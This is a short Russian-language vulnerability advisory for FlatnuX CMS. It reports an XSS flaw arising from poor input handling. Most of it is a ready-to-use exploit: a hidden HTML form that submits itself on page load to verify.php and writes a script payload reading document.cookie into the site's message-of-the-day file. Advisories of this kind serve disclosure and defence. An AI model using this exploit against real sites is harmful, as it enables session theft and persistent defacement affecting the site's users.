Программа: FlatnuX CMS
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form action="http://example.com/verify.php" method="post" name="main" >
<input type="hidden" name="mod" value="modcont" />
<input type="hidden" name="from" value="/controlcenter.php?mod=controlcenter" />
<input type="hidden" name="file" value="misc/motd.en.php" />
<input type="hidden" name="linktolocal" value="misc/motd.en.php" />
<input type="hidden" name="linktolocal" value="misc/motd.en.php" />
<input type="hidden" name="body" value='welcome to flatnux..."><script>alert(document.cookie)</script>'
/>
<input type="hidden" name="file" value="misc/motd.en.php" />
</form>
<script>
document.main.submit();
</script>
